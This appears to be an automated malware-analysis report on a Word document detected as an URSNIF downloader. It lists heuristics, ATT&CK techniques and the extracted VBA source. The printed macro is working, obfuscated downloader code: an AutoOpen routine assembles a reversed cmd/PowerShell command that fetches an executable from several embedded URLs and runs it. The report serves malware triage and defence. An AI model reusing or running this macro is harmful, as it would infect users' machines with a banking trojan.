MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and attempts to execute obfuscated commands. The reconstructed command string suggests an attempt to download and execute a second-stage payload, likely via a command-line execution. The ClamAV detection of 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Hour "6565" + "jp" VBA.Shell CleanString(UW) + BiQHoqnbdd + adrGHvvjMVkzXZ + QpMlwfkzB + wWDwzzPQRj + rMsAtKlv + PkwcACBSIm + wkEQcdGMmMYY, 37 - 37 Hour "4629" + "If" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On _ -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5379 bytes |
SHA-256: 05c6d9eaa92e1828d5d5bd7b18e34931e257becad2275c04315b35f67d7aece1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
60 of 86 identifiers look randomly generated (e.g. 'RIoVrasvzGsXoH'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "smYFTTXPzic"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "606" + "498721065"
Hour "FXCw" + "7423" + "tNakMhu" + "111463566"
Hour "6565" + "jp"
VBA.Shell CleanString(UW) + BiQHoqnbdd + adrGHvvjMVkzXZ + QpMlwfkzB + wWDwzzPQRj + rMsAtKlv + PkwcACBSIm + wkEQcdGMmMYY, 37 - 37
Hour "4629" + "If"
Hour "217698370" + "kOvP"
End Sub
Attribute VB_Name = "ituXcZwVVLjcQ"
Function QpMlwfkzB()
On _
Error _
Resume _
Next
Hour "GIZXW" + "zU"
Hour "71169929" + "zc" + "iCNf" + "Md"
Hour "397792830" + "40621450" + "hqIztWki" + "7022"
Hour "kdLiQjz" + "80253174" + "dsUSHfvjDpEdqz" + "GzPzDHCP"
zOAlYPwU = "cmd /" + "V:^" + "ON" + "/C" + Chr(1 + 0 + 0 + 3 + 30) + "^se^" + "t ^" + "z^a" + "^K=^ ^" + " ^ ^ ^" + " ^ ^ " + "^ "
Hour "8057" + "F"
Hour "3438" + "h" + "363379967" + "9909"
Hour "h" + "padk" + "322062482" + "Zpni"
RdoUUDNqS = "^ ^ " + " ^ " + " ^ ^}" + "}" + "^{hct^a" + "c"
Hour "145692879" + "wa"
Hour "vu" + "295685016"
Hour "P" + "218193817" + "EGsKVDmGBdXhzj" + "QKEEQnOjG"
Hour "116738720" + "lIi"
wmbSjEtwwt = "^};^k^a" + "^er" + "^b^;U" + "TP$^ " + "m^" + "et^I^" + "-^ekov" + "n^I;)" + "UT^P^$ " + "^" + ",^Po^p$"
Hour "2675" + "p" + "lB" + "zbZJ"
Hour "458720609" + "K" + "skYcaljqA" + "RIoVrasvzGsXoH"
Hour "80517613" + "FXvwZKGmHwtpjQ"
kpHfJK = "(el^" + "iF" + "^d^" + "a^o^l" + "n^w^o" + "^D.zZ" + "^B" + "^$^{yrt" + "^{)" + "s^Z^h^" + "$^ n^i"
Hour "8761" + "321886246"
Hour "o" + "2704"
Hour "53677879" + "dNvG" + "w" + "SjO"
TVqQczqns = " ^P" + "^o^p$(^" + "hc^a^er" + "^o^f;'^" + "e^xe.'"
QpMlwfkzB = zOAlYPwU + RdoUUDNqS + wmbSjEtwwt + kpHfJK + TVqQczqns
Hour "223377487" + "3447"
Hour "mXCHSNhU" + "470078967"
End Function
Function wWDwzzPQRj()
On _
Error _
Resume _
Next
Hour "sULX" + "ak" + "533000934" + "qFdoEwVHP"
Hour "EkBsXlowhb" + "9840"
Hour "zwVAOhZJcYC" + "6580" + "1150" + "KNCPzBJz"
MkOGKJaz = "^+rUV" + "$^" + "+'\" + "'^+" + "c" + "il" + "^b" + "^u^p^:" + "vn^"
Hour "2470" + "HIo"
Hour "uzGMn" + "Qjhkp" + "772" + "2178"
Hour "437469441" + "1216" + "W" + "zq"
GbQbvIJ = "e$=U^" + "TP$" + "^;'^0^" + "4" + "^6'^" + " ^=^" + " " + "rU" + "V^$" + ";)^" + "'@^'(t"
Hour "439880376" + "184353572" + "ChXGF" + "VVibAIUmiMrVJV"
ljqJitt = "i^" + "l^pS." + "^" + "'97^L^" + "pv6"
Hour "3614" + "q"
Hour "cETFzWHFonlk" + "sabn" + "pSuUoV" + "i"
Hour "345903204" + "SCz" + "Bp" + "ClrVzbWMU"
viODsjjcjPw = "k^" + "0/^m" + "oc" + "^" + "." + "31^02n" + "^oit^a" + "vo" + "nn^ior" + "^p" + "//:^"
Hour "WtCYBWp" + "Au"
Hour "VAMhzIPw" + "3704" + "RbqmmpNjDzYqwz" + "rYHUmHsazZhz"
Hour "rlmnvE" + "198517837" + "361313226" + "ljaiV"
rVwpVbZXv = "p^t^t" + "^h@^l" + "KYm/^t^" + "en" + ".^o^i^b" + "^kn^i" + "l/" + "/" + ":p" + "^tth" + "^@b^lhf"
Hour "b" + "2189"
Hour "AqNEs" + "O" + "182593414" + "9804"
Hour "lDA" + "SGphqQpFE" + "WI" + "piSlraGfYuVVl"
XwcPh = "/^m^oc" + "^.^" + "h^e^yi" + "lo" + "t^a/" + "/^:^p" + "t^"
Hour "tcu" + "tMT" + "7399" + "48406580"
Hour "YGEjjTEwz" + "8260"
Hour "kqwz" + "k"
XbNNjMY = "th@T/" + "m^oc.^s" + "n" + "^ae^" + "j" + "^l^apo"
Hour "9273" + "2569" + "miuwWkoluiRni" + "420983650"
RwsKSNuDS = "//:^pt" + "t" + "^h@qD" + "N^p" + "/^m^oc." + "isab^" + "kac^o" + "n^" + "er^" + "m"
Hour "244987978" + "4259" + "9720695" + "KfZoJ"
Hour "jOXdqK" + "QGzANoB" + "5888" + "TLIZpLI"
iCcoLmAT = "^i/" + "/^:p" + "^tt" + "^" + "h'^=s^" + "Z^h^$" + "^;tn" + "^" + "ei^lC" + "^be^W.^" + "t^e" + "N ^tc" + "e^j^b^"
Hour "105789348" + "cT"
Hour "tr" + "CTFKwStz" + "Uthr" + "cal"
Hour "DRBonQlTzKj" + "GzbXRLndt" + "108621155" + "370430678"
Hour "YLNfj" + "326719054" + "VaI" + "qn"
WIPHlFJC = "o-^" + "wen=^zZ" + "^B" + "$ " + "ll^eh^s" + "re" + "^w" + "^op" + "&" + "&^f^o"
Hour "7541" + "2203" + "WrH" + "7898"
Hour "9528" + "jbaPKiBp"
Hour "518178279" + "208671858" + "Oz" + "282013789"
udLNiOV = "r" + " /^" + "L %^x " + "^" + "in (3^" + "4" + "9,^-^" + "1^,0)d^" + "o s^e^" + "t W^" + "o^u" + "=!W"
wWDwzzPQRj = MkOGKJaz + GbQbvIJ + ljqJitt + viODsjjcjPw + rVwpVbZXv + XwcPh + XbNNjMY + RwsKSNuDS + iCcoLmAT + WIPHlFJC + udLNiOV
Hour "2971" + "4257" + "pAPQDFPG" + "CIGkSQQj"
Hour "lV" + "EhJp"
Hour "c" + "pEzGBszt"
Hour "bv" + "SUWt"
Hour "CQH" + "77618265"
Hour "7672" + "A"
End Function
Function rMsAtKlv()
On _
Error _
Resume _
Next
Hour "3063" + "wDE" + "6174" + "lPai"
Hour "215719307" + "N" + "JF" + "njLlzvumajLXP"
Hour "6825" + "137572330" + "3517" + "SBpXWv"
zcUWBCFIwJv = "^o^u!" + "!^" + "z^a^" + "K:~%" + "^x,1!&&" + "^if" + " " + "%^x ^l^" + "e" + "q ^0" + " "
Hour "aX" + "Eb" + "aFbwZomKQ" + "9612"
Hour "253799497" + "24162647" + "HQMZdbmCirRdA" + "429245145"
IwdzIlw = "c^" + "a^" + "l^l" + " %W^o" + "^u:^" + "~^-^3" + "5^0%" + Chr(1 + 0 + 0 + 3 + 30) + " " + " "
rMsAtKlv = zcUWBCFIwJv + IwdzIlw
Hour "20221709" + "X"
Hour "knjmBUrG" + "4510" + "KD" + "FAPS"
Hour "357595200" + "387065548"
Hour "5774" + "Ikczww" + "2891" + "BsEIcbo"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.